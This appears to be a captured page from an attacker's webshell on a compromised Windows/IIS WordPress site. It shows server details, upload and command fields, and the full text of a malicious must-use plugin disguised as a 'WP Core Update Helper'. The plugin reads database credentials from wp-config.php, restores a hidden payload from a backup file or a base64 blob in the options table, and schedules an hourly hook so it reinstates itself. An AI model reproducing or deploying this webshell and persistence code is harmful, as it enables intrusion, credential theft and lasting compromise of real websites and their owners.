403Webshell
Server IP : 121.121.20.254  /  Your IP : 216.73.216.142
Web Server : Microsoft-IIS/10.0
System : Windows NT WEB-SERVER 10.0 build 20348 (Windows Server 2022) AMD64
User : IUSR ( 0)
PHP Version : 8.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/inetpub/wwwroot/VerdantVeggies/wp-content/mu-plugins/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/inetpub/wwwroot/VerdantVeggies/wp-content/mu-plugins/wp-cache-handler-b205c21e.php
<?php
/* Plugin Name: WP Core Update Helper */
$_p = 'C:\\Windows\\Temp\\php7EA3.tmp';
$_s = 'C:\\inetpub\\wwwroot\\VerdantVeggies/wp-content/uploads/class-wp-post_b205c21e.php';
$_opt = '_site_transient_health_f940e3f6';
$_min = 41184;
$_hook = 'wp_cache_health_f940e3f6';
if (!function_exists('_wp_cuh_restore')) {
function _wp_cuh_restore($p,$s,$opt,$min){
  $bad = (!file_exists($p) || (@filesize($p) < $min));
  if (!$bad) return;
  if (file_exists($s) && @filesize($s) >= $min) { @copy($s,$p); @chmod($p,0644); return; }
  $_cf = dirname(__DIR__,2).'/wp-config.php';
  if(!file_exists($_cf)) return;
  $_src=@file_get_contents($_cf);
  if(!preg_match("/define\s*\(\s*['\"]DB_NAME['\"]\s*,\s*['\"]([^'\"]*?)['\"]/",$_src,$_m1)) return;
  if(!preg_match("/define\s*\(\s*['\"]DB_USER['\"]\s*,\s*['\"]([^'\"]*?)['\"]/",$_src,$_m2)) return;
  if(!preg_match("/define\s*\(\s*['\"]DB_PASSWORD['\"]\s*,\s*['\"]([^'\"]*?)['\"]/",$_src,$_m3)) return;
  if(!preg_match("/define\s*\(\s*['\"]DB_HOST['\"]\s*,\s*['\"]([^'\"]*?)['\"]/",$_src,$_m4)) return;
  $_tp='wp_'; if(preg_match("/table_prefix\s*=\s*['\"]([^'\"]*?)['\"]/",$_src,$_m5)) $_tp=$_m5[1];
  try{$_db=@(new PDO('mysql:host='.$_m4[1].';dbname='.$_m1[1],$_m2[1],$_m3[1]));
  $_q=$_db->query("SELECT option_value FROM `".$_tp."options` WHERE option_name='".$opt."'");
  if($_q&&($_row=$_q->fetch())){@file_put_contents($p,base64_decode($_row[0]));@chmod($p,0644);}
  }catch(\Exception $e){}
}
}
_wp_cuh_restore($_p,$_s,$_opt,$_min);
add_action('init',function() use ($_hook){
  if (function_exists('wp_next_scheduled') && !wp_next_scheduled($_hook)) wp_schedule_event(time(),'hourly',$_hook);
});
add_action($_hook,function() use ($_p,$_s,$_opt,$_min){ _wp_cuh_restore($_p,$_s,$_opt,$_min); });

Youez - 2016 - github.com/yon3zu
LinuXploit